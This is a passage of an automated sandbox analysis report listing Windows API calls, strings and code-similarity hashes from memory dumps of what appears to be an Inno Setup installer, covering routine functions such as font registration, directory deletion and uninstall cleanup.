                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: B410$B150Focus
                                          • String ID: [rG
                                          • API String ID: 1979529269-1780078340
                                          • Opcode ID: c7144ceedfe7497c6f1595be13c786ac999bba09c7dafa15f546a2b8206c1d70
                                          • Instruction ID: ac1f8aadad1114e4f4ac6eb4a49caba013dce75178cc3f394fbbc19ef7fe8806
                                          • Opcode Fuzzy Hash: c7144ceedfe7497c6f1595be13c786ac999bba09c7dafa15f546a2b8206c1d70
                                          • Instruction Fuzzy Hash: E6512A70A002189FCB11DFA9C891AEEB7F9EF49700F51806AF504EB755D738AD40CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00407314: GetCurrentDirectoryA.KERNEL32(00000104,?,DllRegisterServer,0045450C,00000000,00454649,?,?,00000000,0048D628), ref: 00407323
                                          • LoadCursorA.USER32 ref: 00454513
                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,00454649,?,?,00000000,0048D628), ref: 00454519
                                          • SetErrorMode.KERNEL32(00008000,00000000,00000000,00007F02,00000000,00454649,?,?,00000000,0048D628), ref: 00454532
                                          • 6CAD5550.KERNEL32(00000000,?,00000000,004545F0,?,00000000,0045461F,?,00008000,00000000,00000000,00007F02,00000000,00454649), ref: 0045459F
                                          • FreeLibrary.KERNEL32(00000000,004545F7,?,00008000,00000000,00000000,00007F02,00000000,00454649,?,?,00000000,0048D628), ref: 004545EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Cursor$CurrentD5550DirectoryErrorFreeLibraryLoadMode
                                          • String ID: GetProcAddress$LoadLibrary
                                          • API String ID: 1519367851-2209490600
                                          • Opcode ID: fa0c707e2429b9f3e818442b4ed539e8b7c6d0f8d1f11672067a7b51481401a3
                                          • Instruction ID: 7dc7c09ef35d44694d37c8cae758e1d41a5e37138ca179a59afc0dcdca3846aa
                                          • Opcode Fuzzy Hash: fa0c707e2429b9f3e818442b4ed539e8b7c6d0f8d1f11672067a7b51481401a3
                                          • Instruction Fuzzy Hash: 58319C70F006096BC711EFB68842A5EB6A8EB45709F51447BBD04E7343D67C9D44CAAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ShellExecuteEx.SHELL32(?), ref: 00453ABC
                                          • GetLastError.KERNEL32(00000000,00453B3D,?,?,?,00000001), ref: 00453ACD
                                          • WaitForInputIdle.USER32 ref: 00453AEC
                                          • MsgWaitForMultipleObjects.USER32 ref: 00453B0C
                                          • GetExitCodeProcess.KERNEL32 ref: 00453B19
                                          • CloseHandle.KERNEL32(?,?,?,00000000,00453B3D,?,?,?,00000001), ref: 00453B22
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Wait$CloseCodeErrorExecuteExitHandleIdleInputLastMultipleObjectsProcessShell
                                          • String ID: <
                                          • API String ID: 35504260-4251816714
                                          • Opcode ID: 2f1c130e37fdf713c8ee09ae2cb80f7031dc9d6702a27a2de752bd04e6bc53ea
                                          • Instruction ID: 4f2f080ffbf6904bd028b80bde58d5dd14a7ef3b31ce35135e268bb2354b5d84
                                          • Opcode Fuzzy Hash: 2f1c130e37fdf713c8ee09ae2cb80f7031dc9d6702a27a2de752bd04e6bc53ea
                                          • Instruction Fuzzy Hash: 51315071A00209ABDB10EFA5C885B9E7BF8AF08355F10457AF850E73D2D7789E58CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0
                                          • 6CAD68C0.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00468995,?,?,?,?,00000000), ref: 004688FF
                                          • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00468995), ref: 00468916
                                            • Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94
                                          • AddFontResourceA.GDI32(00000000), ref: 00468933
                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00468947
                                          Strings
                                          • AddFontResource, xrefs: 00468951
                                          • Failed to open Fonts registry key., xrefs: 0046891D
                                          • Failed to set value in Fonts registry key., xrefs: 00468908
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseD6790FontLocalMessageNotifyResourceSendTime
                                          • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                          • API String ID: 1945327637-649663873
                                          • Opcode ID: e6afbb8ca94d69d81efcd09594ad7b5c6e9f67c3cc44129aa4173a6e7730ce8b
                                          • Instruction ID: 0b7725eea1bbc5b47538e9e1a37f4b943f12462ceb285dff8d0c763eb406a5a1
                                          • Opcode Fuzzy Hash: e6afbb8ca94d69d81efcd09594ad7b5c6e9f67c3cc44129aa4173a6e7730ce8b
                                          • Instruction Fuzzy Hash: 3121A3B170020476EB10FB668C42B6E679C9B45748F14457FB940EB2C2EA7C9909862F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94
                                            • Part of subcall function 00450104: SetEndOfFile.KERNEL32(?,00000000,0046730A), ref: 0045010B
                                            • Part of subcall function 00406FE4: 6CAD5F60.KERNEL32(00000000,0048D628,0048B356,00000000,0048B3AB,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406FEF
                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00489548
                                          • OpenProcess.KERNEL32(001F0000,00000000,?,00000000,?), ref: 00489558
                                          • SendMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 0048956E
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,001F0000,00000000,?,00000000,?), ref: 00489576
                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,001F0000,00000000,?,00000000,?), ref: 0048957C
                                          • Sleep.KERNEL32(000001F4,00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,001F0000,00000000,?,00000000,?), ref: 00489586
                                          Strings
                                          • Deleting Uninstall data files., xrefs: 004894C7
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Process$CloseFileHandleLocalMessageObjectOpenSendSingleSleepThreadTimeWaitWindow
                                          • String ID: Deleting Uninstall data files.
                                          • API String ID: 2216181474-2568741658
                                          • Opcode ID: a7476f27cfffe04056263bd10cd1b593b18116b72e861790a672fea6345fcbe5
                                          • Instruction ID: 51625d6d662208fa7e89ffb5b1f44e64a7f96a7290d480644ff5f3bae53c224a
                                          • Opcode Fuzzy Hash: a7476f27cfffe04056263bd10cd1b593b18116b72e861790a672fea6345fcbe5
                                          • Instruction Fuzzy Hash: DB219571704600ABE711F77AEC42B2E37A8D745718F54493BF9009B1E3D678AC008B1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(00000000,00456FA6,?,00000000,?,00000000), ref: 00456EEA
                                            • Part of subcall function 00452C90: FindClose.KERNEL32(000000FF,00452D86), ref: 00452D75
                                            • Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94
                                          Strings
                                          • Deleting directory: %s, xrefs: 00456E73
                                          • Stripped read-only attribute., xrefs: 00456EAC
                                          • Failed to delete directory (%d)., xrefs: 00456F80
                                          • Failed to delete directory (%d). Will retry later., xrefs: 00456F03
                                          • Failed to strip read-only attribute., xrefs: 00456EB8
                                          • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00456F5F
                                          • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00456EC4
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseErrorFindLastLocalTime
                                          • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                          • API String ID: 3419951142-1448842058
                                          • Opcode ID: be68cc5c2ea1bb27d3a1968eb94943e1c89a635c1c6de34cf41a108ae22edbf3
                                          • Instruction ID: a666114b09b834b90605eb2e029ce1ef81d745acec5bf68a3cedde6ddf24539b
                                          • Opcode Fuzzy Hash: be68cc5c2ea1bb27d3a1968eb94943e1c89a635c1c6de34cf41a108ae22edbf3
                                          • Instruction Fuzzy Hash: 9F41B331E042449ACB10DB69D8463AE76E55F4530AF96857BBC0197393CB7C8A0DC75A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCapture.USER32 ref: 00422F6C
                                          • GetCapture.USER32 ref: 00422F7B
                                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422F81
                                          • ReleaseCapture.USER32(00000000,0000001F,00000000,00000000), ref: 00422F86
                                          • GetActiveWindow.USER32 ref: 00422F95
                                          • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00423014
                                          • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00423078
                                          • GetActiveWindow.USER32 ref: 00423087
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CaptureMessageSend$ActiveWindow$Release
                                          • String ID:
                                          • API String ID: 862346643-0
                                          • Opcode ID: b07b682a0d3db05e04191161431f274fd874955fc59dbb90a6b8777cc5b5653a
                                          • Instruction ID: f320766799f76b56ff1f73815002e471a00f175123ebad8ebd638d1fe61db66b
                                          • Opcode Fuzzy Hash: b07b682a0d3db05e04191161431f274fd874955fc59dbb90a6b8777cc5b5653a
                                          • Instruction Fuzzy Hash: BC413F70B00259AFDB10EFA9DA46B9E77F1EF48304F5140BAF414AB292D7789E409B1C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 72E5AC50.USER32(00000000), ref: 00429552
                                          • GetTextMetricsA.GDI32(00000000), ref: 0042955B
                                            • Part of subcall function 0041A2B0: CreateFontIndirectA.GDI32(?), ref: 0041A36F
                                          • SelectObject.GDI32(00000000,00000000), ref: 0042956A
                                          • GetTextMetricsA.GDI32(00000000,?), ref: 00429577
                                          • SelectObject.GDI32(00000000,00000000), ref: 0042957E
                                          • 72E5B380.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00429586
                                          • GetSystemMetrics.USER32 ref: 004295AB
                                          • GetSystemMetrics.USER32 ref: 004295C5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Metrics$ObjectSelectSystemText$B380CreateFontIndirect
                                          • String ID:
                                          • API String ID: 3751190600-0
                                          • Opcode ID: 42eb9f9568d47a56d4dd64e5859645b6fd94eef733c9255efa467db7d7aa65c1
                                          • Instruction ID: 49a99a9963fa550412aa89e52ade3804ecb6ea0e128110f1924ac4b1d55f2594
                                          • Opcode Fuzzy Hash: 42eb9f9568d47a56d4dd64e5859645b6fd94eef733c9255efa467db7d7aa65c1
                                          • Instruction Fuzzy Hash: C101E1A27053203AE711A7BADCC2B6B25C8CF84358F44053BF646DA3C2D96D9C90836E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 72E5AC50.USER32(00000000,?,00419121,0048B789), ref: 0041DEEF
                                          • 72E5AD70.GDI32(00000000,0000005A,00000000,?,00419121,0048B789), ref: 0041DEF9
                                          • 72E5B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419121,0048B789), ref: 0041DF06
                                          • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DF15
                                          • GetStockObject.GDI32(00000007), ref: 0041DF23
                                          • GetStockObject.GDI32(00000005), ref: 0041DF2F
                                          • GetStockObject.GDI32(0000000D), ref: 0041DF3B
                                          • LoadIconA.USER32 ref: 0041DF4C
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ObjectStock$B380IconLoad
                                          • String ID:
                                          • API String ID: 1412791550-0
                                          • Opcode ID: dd4b9c7aef87865718c000e397f45e154360b1af399aa1f9483cb2bab1bb8be1
                                          • Instruction ID: ae707862530499e61e56544efeec0af492468148c1ffb6533c46f2cff97e135a
                                          • Opcode Fuzzy Hash: dd4b9c7aef87865718c000e397f45e154360b1af399aa1f9483cb2bab1bb8be1
                                          • Instruction Fuzzy Hash: 7011F1B0A452096EE740BF695C52B6E2794EB14708F00843FF608BF2E1E7792C408B6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadCursorA.USER32 ref: 0045D594
                                          • SetCursor.USER32(00000000,00000000,00007F02), ref: 0045D59A
                                          • SetCursor.USER32(00000000,0045D866,00007F02), ref: 0045D5F0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Cursor$Load
                                          • String ID: $ $@
                                          • API String ID: 1675784387-2546599590
                                          • Opcode ID: 6ccaf6c9540996d4e0a6697c76b1ecd3fa8062e0d884f2f87ba891cbd3cdf676
                                          • Instruction ID: b001bef726f5750741a7b03e36ed03e6f94e887b89092d92c47412017fe15e3a
                                          • Opcode Fuzzy Hash: 6ccaf6c9540996d4e0a6697c76b1ecd3fa8062e0d884f2f87ba891cbd3cdf676
                                          • Instruction Fuzzy Hash: 3EC18230E006449FDB20EF69C985B9EBBF1EF04315F1485AAE855977A2D778AE48CB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004526D3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringWrite
                                          • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                          • API String ID: 390214022-3304407042
                                          • Opcode ID: c2048ae5e48d74ef76196b4200b5e20616c6102c4444108598072f678010fe0f
                                          • Instruction ID: d61ef256aa0c7cd0868eec0a7ced69166b375f92d2fe722ad9f6fe2e6f6e2ff5
                                          • Opcode Fuzzy Hash: c2048ae5e48d74ef76196b4200b5e20616c6102c4444108598072f678010fe0f
                                          • Instruction Fuzzy Hash: 34911174E002099BDB11EBA5C942BDEB7B5EF49305F508567EC00B7392D7B8AE09CA58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 76E2B690.OLE32(0048CA20,00000000,00000001,0048C788,?,00000000,00454D7E), ref: 00454BC4
                                            • Part of subcall function 00403DEC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403E26
                                            • Part of subcall function 00403DEC: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403E31
                                          • 76E2B690.OLE32(0048C778,00000000,00000001,0048C788,?,00000000,00454D7E), ref: 00454BE8
                                          • SysFreeString.OLEAUT32(00000000), ref: 00454D43
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: B690String$AllocByteCharFreeMultiWide
                                          • String ID: CoCreateInstance$IPersistFile::Save$IShellLink::QueryInterface
                                          • API String ID: 3058977878-615220198
                                          • Opcode ID: 3ded40c75012dff9dd3ae82a8ffb6f9a9cc022837f73b4f2e7b1fd63269d23d0
                                          • Instruction ID: 47847e775519555dd8af957fb4ba689ed973b0fe44fd76accd0468b8e366bdf7
                                          • Opcode Fuzzy Hash: 3ded40c75012dff9dd3ae82a8ffb6f9a9cc022837f73b4f2e7b1fd63269d23d0
                                          • Instruction Fuzzy Hash: 8F513171600105AFDB50EFA9C885F9E77F8AF88305F014065F914EB252D778DD48CB18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemDefaultLCID.KERNEL32(00000000,004089FC,?,?,?,?,00000000,00000000,00000000,?,00409A43,00000000,00409A56), ref: 004087CE
                                            • Part of subcall function 004085FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0048D4C0,00000001,?,004086C7,?,00000000,004087A6), ref: 0040861A
                                            • Part of subcall function 00408648: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040884A,?,?,?,00000000,004089FC), ref: 0040865B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: InfoLocale$DefaultSystem
                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                          • API String ID: 1044490935-665933166
                                          • Opcode ID: 865e2fdc49fa9c0e7c69f9e116ed740243eb306fe370b25025bc42776b06ac5e
                                          • Instruction ID: 1898f190052903b7415bb522bcd58ff52e8278006798509407b2a1fcb900f596
                                          • Opcode Fuzzy Hash: 865e2fdc49fa9c0e7c69f9e116ed740243eb306fe370b25025bc42776b06ac5e
                                          • Instruction Fuzzy Hash: 5D513A24B01248ABDB01FAA99D41A9E776ADB88704F50D47FB041BB7D7CE3CDA059B1C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetVersion.KERNEL32(00000000,004119C1), ref: 00411854
                                          • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411912
                                            • Part of subcall function 00411B74: CreatePopupMenu.USER32(?,0041197D,00000000,00000000,004119C1), ref: 00411B8E
                                          • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 0041199E
                                            • Part of subcall function 00411B74: CreateMenu.USER32(?,0041197D,00000000,00000000,004119C1), ref: 00411B98
                                          • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 00411985
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Menu$Insert$Create$ItemPopupVersion
                                          • String ID: ,$?
                                          • API String ID: 2359071979-2308483597
                                          • Opcode ID: 01793db05cc1d1000f61b38ee2be08afbd7054388c0db830af7fa18c141c7570
                                          • Instruction ID: 7ba0501c80767f15217744d9ac03cda2ca3cae6e070b487bfbc79445ba8f9420
                                          • Opcode Fuzzy Hash: 01793db05cc1d1000f61b38ee2be08afbd7054388c0db830af7fa18c141c7570
                                          • Instruction Fuzzy Hash: C75126B0A101449BDB10EF7ADC816EE7BF5AB09304B15857BF944E72A2D73CDA41CB18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BFF0
                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BFFF
                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041C050
                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041C05E
                                          • DeleteObject.GDI32(?), ref: 0041C067
                                          • DeleteObject.GDI32(?), ref: 0041C070
                                          • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041C08D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
